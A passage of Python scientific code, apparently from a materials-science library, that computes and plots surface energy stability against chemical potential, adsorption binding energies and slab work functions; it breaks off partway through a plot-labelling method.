for u in all_chempots:
delu_dict[ref_delu] = u
wulffshape = self.wulff_from_chempot(delu_dict=delu_dict, no_clean=no_clean,
no_doped=no_doped, delu_default=delu_default)
for hkl in wulffshape.area_fraction_dict.keys():
hkl_area_dict[hkl].append(wulffshape.area_fraction_dict[hkl])
# Plot the area fraction vs chemical potential for each facet
plt = pretty_plot(width=8, height=7)
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
clean_entry = list(self.all_slab_entries[hkl].keys())[0]
# Ignore any facets that never show up on the
# Wulff shape regardless of chemical potential
if all([a == 0 for a in hkl_area_dict[hkl]]):
continue
else:
plt.plot(all_chempots, hkl_area_dict[hkl],
'--', color=self.color_dict[clean_entry],
label=str(hkl))
# Make the figure look nice
plt.ylabel(r"Fractional area $A^{Wulff}_{hkl}/A^{Wulff}$")
self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split("_")[1],
axes, rect=[-0.0, 0, 0.95, 1], pad=5, ylim=[0, 1])
return plt
    def get_surface_equilibrium(self, slab_entries, delu_dict=None):
        """
        Takes in a list of SlabEntries and calculates the chemical potentials
        at which all slabs in the list coexists simultaneously. Useful for
        building surface phase diagrams. Note that to solve for x equations
        (x slab_entries), there must be x free variables (chemical potentials).
        Adjust delu_dict as need be to get the correct number of free variables.

        Args:
            slab_entries (array): The coefficients of the first equation
            delu_dict (Dict): Dictionary of the chemical potentials to be set as
                constant. Note the key should be a sympy Symbol object of the
                format: Symbol("delu_el") where el is the name of the element.

        Returns:
            (array): Array containing a solution to x equations with x
                variables (x-1 chemical potential and 1 surface energy)
        """
        # Generate all possible coefficients
        all_parameters = []
        all_eqns = []
        for slab_entry in slab_entries:
            se = self.surfe_dict[slab_entry]
            # remove the free chempots we wish to keep constant and
            # set the equation to 0 (subtract gamma from both sides)
            if type(se).__name__ == "float":
                # Constant surface energy: the equation is simply
                # se - gamma = 0 with no free chempots.
                all_eqns.append(se - Symbol("gamma"))
            else:
                se = sub_chempots(se, delu_dict) if delu_dict else se
                all_eqns.append(se - Symbol("gamma"))
                # Record each remaining free symbol exactly once,
                # preserving first-seen order.
                all_parameters.extend([p for p in list(se.free_symbols)
                                       if p not in all_parameters])
        all_parameters.append(Symbol("gamma"))
        # Now solve the system of linear eqns to find the chempot
        # where the slabs are at equilibrium with each other
        soln = linsolve(all_eqns, all_parameters)
        if not soln:
            warnings.warn("No solution")
            return soln
        # linsolve returns a FiniteSet; take its single solution tuple and
        # map each parameter to its solved value (value order matches
        # all_parameters).
        return {p: list(soln)[0][i] for i, p in enumerate(all_parameters)}
def stable_u_range_dict(self, chempot_range, ref_delu, no_doped=True,
no_clean=False, delu_dict={}, miller_index=(),
dmu_at_0=False, return_se_dict=False):
"""
Creates a dictionary where each entry is a key pointing to a
chemical potential range where the surface of that entry is stable.
Does so by enumerating through all possible solutions (intersect)
for surface energies of a specific facet.
Args:
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
dmu_at_0 (bool): If True, if the surface energies corresponding to
the chemical potential range is between a negative and positive
value, the value is a list of three chemical potentials with the
one in the center corresponding a surface energy of 0. Uselful
in identifying unphysical ranges of surface energies and their
chemical potential range.
return_se_dict (bool): Whether or not to return the corresponding
dictionary of surface energies
"""
chempot_range = sorted(chempot_range)
stable_urange_dict, se_dict = {}, {}
# Get all entries for a specific facet
for hkl in self.all_slab_entries.keys():
entries_in_hkl = []
# Skip this facet if this is not the facet we want
if miller_index and hkl != tuple(miller_index):
continue
if not no_clean:
entries_in_hkl.extend([clean for clean in self.all_slab_entries[hkl]])
if not no_doped:
for entry in self.all_slab_entries[hkl]:
entries_in_hkl.extend([ads_entry for ads_entry in
self.all_slab_entries[hkl][entry]])
for entry in entries_in_hkl:
stable_urange_dict[entry] = []
se_dict[entry] = []
# if there is only one entry for this facet, then just give it the
# default urange, you can't make combinations with just 1 item
if len(entries_in_hkl) == 1:
stable_urange_dict[entries_in_hkl[0]] = chempot_range
u1, u2 = delu_dict.copy(), delu_dict.copy()
u1[ref_delu], u2[ref_delu] = chempot_range[0], chempot_range[1]
se = self.as_coeffs_dict[entries_in_hkl[0]]
se_dict[entries_in_hkl[0]] = [sub_chempots(se, u1), sub_chempots(se, u2)]
continue
for pair in itertools.combinations(entries_in_hkl, 2):
# I'm assuming ref_delu was not set in delu_dict,
# so the solution should be for ref_delu
solution = self.get_surface_equilibrium(pair, delu_dict=delu_dict)
# Check if this solution is stable
if not solution:
continue
new_delu_dict = delu_dict.copy()
new_delu_dict[ref_delu] = solution[ref_delu]
stable_entry, gamma = self.get_stable_entry_at_u(hkl, new_delu_dict,
no_doped=no_doped,
no_clean=no_clean)
if stable_entry not in pair:
continue
# Now check if the solution is within the chempot range
if not (chempot_range[0] <= solution[ref_delu] <= chempot_range[1]):
continue
for entry in pair:
stable_urange_dict[entry].append(solution[ref_delu])
se_dict[entry].append(gamma)
# Now check if all entries have 2 chempot values. If only
# one, we need to set the other value as either the upper
# limit or lower limit of the user provided chempot_range
new_delu_dict = delu_dict.copy()
for u in chempot_range:
new_delu_dict[ref_delu] = u
entry, gamma = self.get_stable_entry_at_u(hkl, delu_dict=new_delu_dict,
no_doped=no_doped,
no_clean=no_clean)
stable_urange_dict[entry].append(u)
se_dict[entry].append(gamma)
if dmu_at_0:
for entry in se_dict.keys():
# if se are of opposite sign, determine chempot when se=0.
# Useful for finding a chempot range where se is unphysical
if not stable_urange_dict[entry]:
continue
if se_dict[entry][0] * se_dict[entry][1] < 0:
# solve for gamma=0
se = self.as_coeffs_dict[entry]
se_dict[entry].append(0)
stable_urange_dict[entry].append(solve(sub_chempots(se, delu_dict),
ref_delu)[0])
# sort the chempot ranges for each facet
for entry in stable_urange_dict.keys():
se_dict[entry] = [se for i, se in sorted(zip(stable_urange_dict[entry],
se_dict[entry]))]
stable_urange_dict[entry] = sorted(stable_urange_dict[entry])
if return_se_dict:
return stable_urange_dict, se_dict
else:
return stable_urange_dict
def color_palette_dict(self, alpha=0.35):
"""
Helper function to assign each facet a unique color using a dictionary.
Args:
alpha (float): Degree of transparency
return (dict): Dictionary of colors (r,g,b,a) when plotting surface
energy stability. The keys are individual surface entries where
clean surfaces have a solid color while the corresponding adsorbed
surface will be transparent.
"""
color_dict = {}
for hkl in self.all_slab_entries.keys():
rgb_indices = [0, 1, 2]
color = [0, 0, 0, 1]
random.shuffle(rgb_indices)
for i, ind in enumerate(rgb_indices):
if i == 2:
break
color[ind] = np.random.uniform(0, 1)
# Get the clean (solid) colors first
clean_list = np.linspace(0, 1, len(self.all_slab_entries[hkl]))
for i, clean in enumerate(self.all_slab_entries[hkl].keys()):
c = copy.copy(color)
c[rgb_indices[2]] = clean_list[i]
color_dict[clean] = c
# Now get the adsorbed (transparent) colors
for ads_entry in self.all_slab_entries[hkl][clean]:
c_ads = copy.copy(c)
c_ads[3] = alpha
color_dict[ads_entry] = c_ads
return color_dict
def chempot_vs_gamma_plot_one(self, plt, entry, ref_delu, chempot_range,
delu_dict={}, delu_default=0, label='', JPERM2=False):
"""
Helper function to help plot the surface energy of a
single SlabEntry as a function of chemical potential.
Args:
plt (Plot): A plot.
entry (SlabEntry): Entry of the slab whose surface energy we want
to plot
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
label (str): Label of the slab for the legend.
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of surface energy vs chemical potential for one entry.
"""
chempot_range = sorted(chempot_range)
# use dashed lines for slabs that are not stoichiometric
# wrt bulk. Label with formula if nonstoichiometric
ucell_comp = self.ucell_entry.composition.reduced_composition
if entry.adsorbates:
s = entry.cleaned_up_slab
clean_comp = s.composition.reduced_composition
else:
clean_comp = entry.composition.reduced_composition
mark = '--' if ucell_comp != clean_comp else '-'
delu_dict = self.set_all_variables(delu_dict, delu_default)
delu_dict[ref_delu] = chempot_range[0]
gamma_min = self.as_coeffs_dict[entry]
gamma_min = gamma_min if type(gamma_min).__name__ == \
"float" else sub_chempots(gamma_min, delu_dict)
delu_dict[ref_delu] = chempot_range[1]
gamma_max = self.as_coeffs_dict[entry]
gamma_max = gamma_max if type(gamma_max).__name__ == \
"float" else sub_chempots(gamma_max, delu_dict)
gamma_range = [gamma_min, gamma_max]
se_range = np.array(gamma_range) * EV_PER_ANG2_TO_JOULES_PER_M2 \
if JPERM2 else gamma_range
mark = entry.mark if entry.mark else mark
c = entry.color if entry.color else self.color_dict[entry]
plt.plot(chempot_range, se_range, mark, color=c, label=label)
return plt
def chempot_vs_gamma(self, ref_delu, chempot_range, miller_index=(),
delu_dict={}, delu_default=0, JPERM2=False,
show_unstable=False, ylim=[], plt=None,
no_clean=False, no_doped=False,
use_entry_labels=False, no_label=False):
"""
Plots the surface energy as a function of chemical potential.
Each facet will be associated with its own distinct colors.
Dashed lines will represent stoichiometries different from that
of the mpid's compound. Transparent lines indicates adsorption.
Args:
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
show_unstable (bool): Whether or not to show parts of the surface
energy plot outside the region of stability.
ylim ([ymax, ymin]): Range of y axis
no_doped (bool): Whether to plot for the clean slabs only.
no_clean (bool): Whether to plot for the doped slabs only.
use_entry_labels (bool): If True, will label each slab configuration
according to their given label in the SlabEntry object.
no_label (bool): Option to turn off labels.
Returns:
(Plot): Plot of surface energy vs chempot for all entries.
"""
chempot_range = sorted(chempot_range)
plt = pretty_plot(width=8, height=7) if not plt else plt
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
if miller_index and hkl != tuple(miller_index):
continue
# Get the chempot range of each surface if we only
# want to show the region where each slab is stable
if not show_unstable:
stable_u_range_dict = self.stable_u_range_dict(chempot_range, ref_delu,
no_doped=no_doped,
delu_dict=delu_dict,
miller_index=hkl)
already_labelled = []
label = ''
for clean_entry in self.all_slab_entries[hkl]:
urange = stable_u_range_dict[clean_entry] if \
not show_unstable else chempot_range
# Don't plot if the slab is unstable, plot if it is.
if urange != []:
label = clean_entry.label
if label in already_labelled:
label = None
else:
already_labelled.append(label)
if not no_clean:
if use_entry_labels:
label = clean_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(plt, clean_entry, ref_delu,
urange, delu_dict=delu_dict,
delu_default=delu_default,
label=label, JPERM2=JPERM2)
if not no_doped:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
# Plot the adsorbed slabs
# Generate a label for the type of slab
urange = stable_u_range_dict[ads_entry] \
if not show_unstable else chempot_range
if urange != []:
if use_entry_labels:
label = ads_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(plt, ads_entry,
ref_delu, urange,
delu_dict=delu_dict,
delu_default=delu_default,
label=label,
JPERM2=JPERM2)
# Make the figure look nice
plt.ylabel(r"Surface energy (J/$m^{2}$)") if JPERM2 \
else plt.ylabel(r"Surface energy (eV/$\AA^{2}$)")
plt = self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split("_")[1],
axes, ylim=ylim)
return plt
def monolayer_vs_BE(self, plot_eads=False):
"""
Plots the binding energy energy as a function of monolayers (ML), i.e.
the fractional area adsorbate density for all facets. For each
facet at a specific monlayer, only plot the lowest binding energy.
Args:
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
Returns:
(Plot): Plot of binding energy vs monolayer for all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
ml_be_dict = {}
for clean_entry in self.all_slab_entries[hkl].keys():
if self.all_slab_entries[hkl][clean_entry]:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
if ads_entry.get_monolayer not in ml_be_dict.keys():
ml_be_dict[ads_entry.get_monolayer] = 1000
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
if be < ml_be_dict[ads_entry.get_monolayer]:
ml_be_dict[ads_entry.get_monolayer] = be
# sort the binding energies and monolayers
# in order to properly draw a line plot
vals = sorted(ml_be_dict.items())
monolayers, BEs = zip(*vals)
plt.plot(monolayers, BEs, '-o',
c=self.color_dict[clean_entry], label=hkl)
adsorbates = tuple(ads_entry.ads_entries_dict.keys())
plt.xlabel(" %s" * len(adsorbates) % adsorbates + " Coverage (ML)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads \
else plt.ylabel("Binding Energy (eV)")
plt.legend()
plt.tight_layout()
return plt
def chempot_plot_addons(self, plt, xrange, ref_el, axes, pad=2.4,
rect=[-0.047, 0, 0.84, 1], ylim=[]):
"""
Helper function to a chempot plot look nicer.
Args:
plt (Plot) Plot to add things to.
xrange (list): xlim parameter
ref_el (str): Element of the referenced chempot.
axes(axes) Axes object from matplotlib
pad (float) For tight layout
rect (list): For tight layout
ylim (ylim parameter):
return (Plot): Modified plot with addons.
return (Plot): Modified plot with addons.
"""
# Make the figure look nice
plt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.)
axes.set_xlabel(r"Chemical potential $\Delta\mu_{%s}$ (eV)" % (ref_el))
ylim = ylim if ylim else axes.get_ylim()
plt.xticks(rotation=60)
plt.ylim(ylim)
xlim = axes.get_xlim()
plt.xlim(xlim)
plt.tight_layout(pad=pad, rect=rect)
plt.plot([xrange[0], xrange[0]], ylim, '--k')
plt.plot([xrange[1], xrange[1]], ylim, '--k')
xy = [np.mean([xrange[1]]), np.mean(ylim)]
plt.annotate("%s-rich" % (ref_el), xy=xy,
xytext=xy, rotation=90, fontsize=17)
xy = [np.mean([xlim[0]]), np.mean(ylim)]
plt.annotate("%s-poor" % (ref_el), xy=xy,
xytext=xy, rotation=90, fontsize=17)
return plt
def BE_vs_clean_SE(self, delu_dict, delu_default=0, plot_eads=False,
annotate_monolayer=True, JPERM2=False):
"""
For each facet, plot the clean surface energy against the most
stable binding energy.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
annotate_monolayer (bool): Whether or not to label each data point
with its monolayer (adsorbate density per unit primiitve area)
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of clean surface energy vs binding energy for
all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
for clean_entry in self.all_slab_entries[hkl].keys():
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
if self.all_slab_entries[hkl][clean_entry]:
clean_se = self.as_coeffs_dict[clean_entry]
se = sub_chempots(clean_se, all_delu_dict)
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
ml = ads_entry.get_monolayer
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
# Now plot the surface energy vs binding energy
plt.scatter(se, be)
if annotate_monolayer:
plt.annotate("%.2f" % (ml), xy=[se, be],
xytext=[se, be])
plt.xlabel(r"Surface energy ($J/m^2$)") if JPERM2 \
else plt.xlabel(r"Surface energy ($eV/\AA^2$)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads \
else plt.ylabel("Binding Energy (eV)")
plt.tight_layout()
plt.xticks(rotation=60)
return plt
def surface_chempot_range_map(self, elements, miller_index, ranges,
                              incr=50, no_doped=False, no_clean=False,
                              delu_dict=None, plt=None, annotate=True,
                              show_unphyiscal_only=False, fontsize=10):
    """
    Adapted from the get_chempot_range_map() method in the PhaseDiagram
    class. Plot the chemical potential range map based on surface
    energy stability. Currently works only for 2-component PDs. At
    the moment uses a brute force method by enumerating through the
    range of the first element chempot with a specified increment
    and determines the chempot range of the second element for each
    SlabEntry. Future implementation will determine the chempot range
    map first by solving systems of equations up to 3 instead of 2.

    Args:
        elements (list): Sequence of elements to be considered as independent
            variables. E.g., if you want to show the stability ranges of
            all Li-Co-O phases wrt to duLi and duO, you will supply
            [Element("Li"), Element("O")]
        miller_index ([h, k, l]): Miller index of the surface we are interested in
        ranges ([[range1], [range2]]): List of chempot ranges (max and min values)
            for the first and second element.
        incr (int): Number of points to sample along the range of the first chempot
        no_doped (bool): Whether or not to include doped systems.
        no_clean (bool): Whether or not to include clean systems.
        delu_dict (Dict): Dictionary of the chemical potentials to be set as
            constant. Note the key should be a sympy Symbol object of the
            format: Symbol("delu_el") where el is the name of the element.
        plt (Plot): Existing plot to draw onto; a new one is created if None.
        annotate (bool): Whether to annotate each "phase" with the label of
            the entry. If no label, uses the reduced formula.
        show_unphyiscal_only (bool): Whether to only show the shaded region where
            surface energy is negative. Useful for drawing other chempot range maps.
        fontsize (int): Font size of the phase annotations.
    """
    # Set up
    delu_dict = delu_dict if delu_dict else {}
    plt = pretty_plot(12, 8) if not plt else plt
    el1, el2 = str(elements[0]), str(elements[1])
    delu1 = Symbol("delu_%s" % (str(elements[0])))
    delu2 = Symbol("delu_%s" % (str(elements[1])))
    range1 = ranges[0]
    range2 = ranges[1]

    # Find a range map for each entry (surface). This part is very slow, will
    # need to implement a more sophisticated method of getting the range map
    vertices_dict = {}
    for dmu1 in np.linspace(range1[0], range1[1], incr):
        # Get chemical potential range of dmu2 for each increment of dmu1
        new_delu_dict = delu_dict.copy()
        new_delu_dict[delu1] = dmu1
        range_dict, se_dict = self.stable_u_range_dict(range2, delu2, dmu_at_0=True,
                                                       miller_index=miller_index,
                                                       no_doped=no_doped,
                                                       no_clean=no_clean,
                                                       delu_dict=new_delu_dict,
                                                       return_se_dict=True)

        # Save the chempot range for dmu1 and dmu2
        for entry in range_dict.keys():
            if not range_dict[entry]:
                continue
            if entry not in vertices_dict.keys():
                vertices_dict[entry] = []
            selist = se_dict[entry]
            # Each vertex stores dmu1 and, for dmu2, the stability range
            # together with the surface energies at its endpoints.
            vertices_dict[entry].append({delu1: dmu1, delu2: [range_dict[entry], selist]})

    # Plot the edges of the phases
    for entry in vertices_dict.keys():
        xvals, yvals = [], []

        # Plot each edge of a phase within the borders
        for ii, pt1 in enumerate(vertices_dict[entry]):
            # Determine if the surface energy at this lower range
            # of dmu2 is negative. If so, shade this region.
            if len(pt1[delu2][1]) == 3:
                if pt1[delu2][1][0] < 0:
                    neg_dmu_range = [pt1[delu2][0][0], pt1[delu2][0][1]]
                else:
                    neg_dmu_range = [pt1[delu2][0][1], pt1[delu2][0][2]]
                # Shade the threshold and region at which se<=0
                plt.plot([pt1[delu1], pt1[delu1]], neg_dmu_range, 'k--')
            elif pt1[delu2][1][0] < 0 and pt1[delu2][1][1] < 0:
                # Any chempot at this point will result
                # in se<0, shade the entire y range
                if not show_unphyiscal_only:
                    plt.plot([pt1[delu1], pt1[delu1]], range2, 'k--')

            if ii == len(vertices_dict[entry]) - 1:
                break
            pt2 = vertices_dict[entry][ii + 1]
            if not show_unphyiscal_only:
                plt.plot([pt1[delu1], pt2[delu1]], [pt1[delu2][0][0], pt2[delu2][0][0]], 'k')

            # Need these values to get a good position for labelling phases
            xvals.extend([pt1[delu1], pt2[delu1]])
            yvals.extend([pt1[delu2][0][0], pt2[delu2][0][0]])

        # Plot the edge along the max x value
        pt = vertices_dict[entry][-1]
        # NOTE(review): this rebinds delu1/delu2 from the vertex dict's key
        # order (relies on insertion order being {delu1, delu2}) and the
        # rebinding carries over into later iterations of the entry loop —
        # confirm this is intended.
        delu1, delu2 = pt.keys()
        xvals.extend([pt[delu1], pt[delu1]])
        yvals.extend(pt[delu2][0])
        if not show_unphyiscal_only:
            plt.plot([pt[delu1], pt[delu1]], [pt[delu2][0][0], pt[delu2][0][-1]], 'k')

        if annotate:
            # Label the phases
            x = np.mean([max(xvals), min(xvals)])
            y = np.mean([max(yvals), min(yvals)])
            label = entry.label if entry.label else entry.composition.reduced_formula
            plt.annotate(label, xy=[x, y], xytext=[x, y], fontsize=fontsize)

    # Label plot
    plt.xlim(range1)
    plt.ylim(range2)
    plt.xlabel(r"$\Delta\mu_{%s} (eV)$" % (el1), fontsize=25)
    plt.ylabel(r"$\Delta\mu_{%s} (eV)$" % (el2), fontsize=25)
    plt.xticks(rotation=60)

    return plt
def set_all_variables(self, delu_dict, delu_default):
    """
    Sets all chemical potential values and returns a dictionary where
    the key is a sympy Symbol and the value is a float (chempot).

    Args:
        delu_dict (dict): Chemical potentials to hold constant. Keys are
            sympy Symbol objects of the form Symbol("delu_el") where el
            is the element name.
        delu_default (float): Default value for all unset chemical potentials.

    Returns:
        Dictionary of set chemical potential values.
    """
    chempot_map = {}
    for symbol in self.list_of_chempots:
        if delu_dict and symbol in delu_dict:
            # Caller pinned this chemical potential explicitly.
            value = delu_dict[symbol]
        elif symbol == 1:
            # The constant term of the grand potential keeps coefficient 1.
            value = symbol
        else:
            value = delu_default
        chempot_map[symbol] = value
    return chempot_map
# def surface_phase_diagram(self, y_param, x_param, miller_index):
# return
#
# def wulff_shape_extrapolated_model(self):
# return
#
# def surface_pourbaix_diagram(self):
#
# return
#
# def surface_p_vs_t_phase_diagram(self):
#
# return
#
# def broken_bond_vs_gamma(self):
#
# return
def entry_dict_from_list(all_slab_entries):
    """
    Converts a list of SlabEntry to an appropriate dictionary. It is
    assumed that if there is no adsorbate, then it is a clean SlabEntry
    and that an adsorbed SlabEntry has the clean_entry parameter set.

    Args:
        all_slab_entries (list): List of SlabEntry objects.

    Returns:
        (dict): Dictionary of SlabEntry with the Miller index as the main
            key to a dictionary with a clean SlabEntry as the key to a
            list of adsorbed SlabEntry.
    """
    entry_dict = {}
    for entry in all_slab_entries:
        hkl = tuple(entry.miller_index)
        # An adsorbed entry points back at its clean slab; a clean
        # entry keys itself.
        clean = entry.clean_entry if entry.clean_entry else entry
        # setdefault replaces the "not in dict.keys()" membership tests.
        entry_dict.setdefault(hkl, {}).setdefault(clean, [])
        if entry.adsorbates:
            entry_dict[hkl][clean].append(entry)
    return entry_dict
class WorkFunctionAnalyzer:
    """
    A class used for calculating the work function
    from a slab model and visualizing the behavior
    of the local potential along the slab.

    .. attribute:: efermi

        The Fermi energy

    .. attribute:: locpot_along_c

        Local potential in eV along points along the axis

    .. attribute:: vacuum_locpot

        The maximum local potential along the c direction for
        the slab model, ie the potential at the vacuum

    .. attribute:: work_function

        The minimum energy needed to move an electron from the
        surface to infinity. Defined as the difference between
        the potential at the vacuum and the Fermi energy.

    .. attribute:: slab

        The slab structure model

    .. attribute:: along_c

        Points along the c direction with same
        increments as the locpot in the c axis

    .. attribute:: ave_locpot

        Mean of the minimum and maximum (vacuum) locpot along c

    .. attribute:: sorted_sites

        List of sites from the slab sorted along the c direction

    .. attribute:: ave_bulk_p

        The average locpot of the slab region along the c direction
    """

    def __init__(self, structure, locpot_along_c, efermi, shift=0, blength=3.5):
        """
        Initializes the WorkFunctionAnalyzer class.

        Args:
            structure (Structure): Structure object modelling the surface
            locpot_along_c (list): Local potential along the c direction
            efermi (float): The Fermi energy
            shift (float): Parameter to translate the slab (and
                therefore the vacuum) of the slab structure, thereby
                translating the plot along the x axis.
            blength (float (Ang)): The longest bond length in the material.
                Used to handle pbc for noncontiguous slab layers
        """
        # ensure shift between 0 and 1
        if shift < 0:
            shift += -1 * int(shift) + 1
        elif shift >= 1:
            shift -= int(shift)
        self.shift = shift

        # properties that can be shifted
        slab = structure.copy()
        slab.translate_sites([i for i, site in enumerate(slab)], [0, 0, self.shift])
        self.slab = slab
        self.sorted_sites = sorted(self.slab, key=lambda site: site.frac_coords[2])

        # Get the plot points between 0 and c
        # increments of the number of locpot points
        self.along_c = np.linspace(0, 1, num=len(locpot_along_c))

        # Reorder the locpot so it lines up with the shifted fractional
        # coordinates: points pushed past 1 wrap to the front of the
        # signal and points pushed below 0 wrap to the back.
        locpot_along_c_mid, locpot_end, locpot_start = [], [], []
        for i, s in enumerate(self.along_c):
            j = s + self.shift
            if j > 1:
                locpot_start.append(locpot_along_c[i])
            elif j < 0:
                locpot_end.append(locpot_along_c[i])
            else:
                locpot_along_c_mid.append(locpot_along_c[i])
        self.locpot_along_c = locpot_start + locpot_along_c_mid + locpot_end

        # identify slab region
        self.slab_regions = get_slab_regions(self.slab, blength=blength)

        # get the average of the signal in the bulk-like region of the
        # slab, i.e. the average of the oscillating region. This gives
        # a rough appr. of the potential in the interior of the slab
        bulk_p = []
        for r in self.slab_regions:
            bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if
                           r[1] >= self.along_c[i] > r[0]])
        # a noncontiguous slab (wrapped around the cell boundary) also
        # contributes the two outer segments
        if len(self.slab_regions) > 1:
            bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if
                           self.slab_regions[1][1] <= self.along_c[i]])
            bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if
                           self.slab_regions[0][0] >= self.along_c[i]])
        self.ave_bulk_p = np.mean(bulk_p)

        # shift independent quantities
        self.efermi = efermi
        self.vacuum_locpot = max(self.locpot_along_c)
        # get the work function
        self.work_function = self.vacuum_locpot - self.efermi
        # for setting ylim and annotating
        self.ave_locpot = (self.vacuum_locpot - min(self.locpot_along_c)) / 2

    def get_locpot_along_slab_plot(self, label_energies=True,
                                   plt=None, label_fontsize=10):
        """
        Returns a plot of the local potential (eV) vs the
        position along the c axis of the slab model (Ang)

        Args:
            label_energies (bool): Whether to label relevant energy
                quantities such as the work function, Fermi energy,
                vacuum locpot, bulk-like locpot
            plt (plt): Matplotlib pylab object
            label_fontsize (float): Fontsize of labels

        Returns plt of the locpot vs c axis
        """
        plt = pretty_plot(width=6, height=4) if not plt else plt

        # plot the raw locpot signal along c
        plt.plot(self.along_c, self.locpot_along_c, 'b--')

        # Get the local averaged signal of the locpot along c
        xg, yg = [], []
        for i, p in enumerate(self.locpot_along_c):
            # average signal is just the bulk-like potential when in the slab region
            in_slab = False
            for r in self.slab_regions:
                if r[0] <= self.along_c[i] <= r[1]:
                    in_slab = True
            # a wrapped (noncontiguous) slab also covers both cell edges
            if len(self.slab_regions) > 1:
                if self.along_c[i] >= self.slab_regions[1][1]:
                    in_slab = True
                if self.along_c[i] <= self.slab_regions[0][0]:
                    in_slab = True

            if in_slab:
                yg.append(self.ave_bulk_p)
                xg.append(self.along_c[i])
            elif p < self.ave_bulk_p:
                # clip dips below the bulk-like level to the bulk level
                yg.append(self.ave_bulk_p)
                xg.append(self.along_c[i])
            else:
                yg.append(p)
                xg.append(self.along_c[i])
        xg, yg = zip(*sorted(zip(xg, yg)))
        plt.plot(xg, yg, 'r', linewidth=2.5, zorder=-1)

        # make it look nice
        if label_energies:
            plt = self.get_labels(plt, label_fontsize=label_fontsize)
        plt.xlim([0, 1])
        plt.ylim([min(self.locpot_along_c),
                  self.vacuum_locpot + self.ave_locpot * 0.2])
        plt.xlabel(r"Fractional coordinates ($\hat{c}$)", fontsize=25)
        plt.xticks(fontsize=15, rotation=45)
        plt.ylabel(r"Potential (eV)", fontsize=25)
        plt.yticks(fontsize=15)

        return plt

    def get_labels(self, plt, label_fontsize=10):
        """
        Handles the optional labelling of the plot with relevant quantities

        Args:
            plt (plt): Plot of the locpot vs c axis
            label_fontsize (float): Fontsize of labels

        Returns Labelled plt
        """
        # center of vacuum and bulk region
        if len(self.slab_regions) > 1:
            label_in_vac = (self.slab_regions[0][1] + self.slab_regions[1][0]) / 2
            # put the bulk label inside the wider of the two slab segments
            if abs(self.slab_regions[0][0] - self.slab_regions[0][1]) > \
                    abs(self.slab_regions[1][0] - self.slab_regions[1][1]):
                label_in_bulk = self.slab_regions[0][1] / 2
            else:
                label_in_bulk = (self.slab_regions[1][1] + self.slab_regions[1][0]) / 2
        else:
            label_in_bulk = (self.slab_regions[0][0] + self.slab_regions[0][1]) / 2
            if self.slab_regions[0][0] > 1 - self.slab_regions[0][1]:
                label_in_vac = self.slab_regions[0][0] / 2
            else:
                label_in_vac = (1 + self.slab_regions[0][1]) / 2

        # label the vacuum locpot
        plt.plot([0, 1], [self.vacuum_locpot] * 2, 'b--', zorder=-5, linewidth=1)
        xy = [label_in_bulk, self.vacuum_locpot + self.ave_locpot * 0.05]
        plt.annotate(r"$V_{vac}=%.2f$" % (self.vacuum_locpot), xy=xy,
                     xytext=xy, color='b', fontsize=label_fontsize)

        # label the fermi energy
        plt.plot([0, 1], [self.efermi] * 2, 'g--',
                 zorder=-5, linewidth=3)
        xy = [label_in_bulk, self.efermi + self.ave_locpot * 0.05]
        plt.annotate(r"$E_F=%.2f$" % (self.efermi), xytext=xy,
                     xy=xy, fontsize=label_fontsize, color='g')

        # label the bulk-like locpot
        plt.plot([0, 1], [self.ave_bulk_p] * 2, 'r--', linewidth=1., zorder=-1)
        xy = [label_in_vac, self.ave_bulk_p + self.ave_locpot * 0.05]
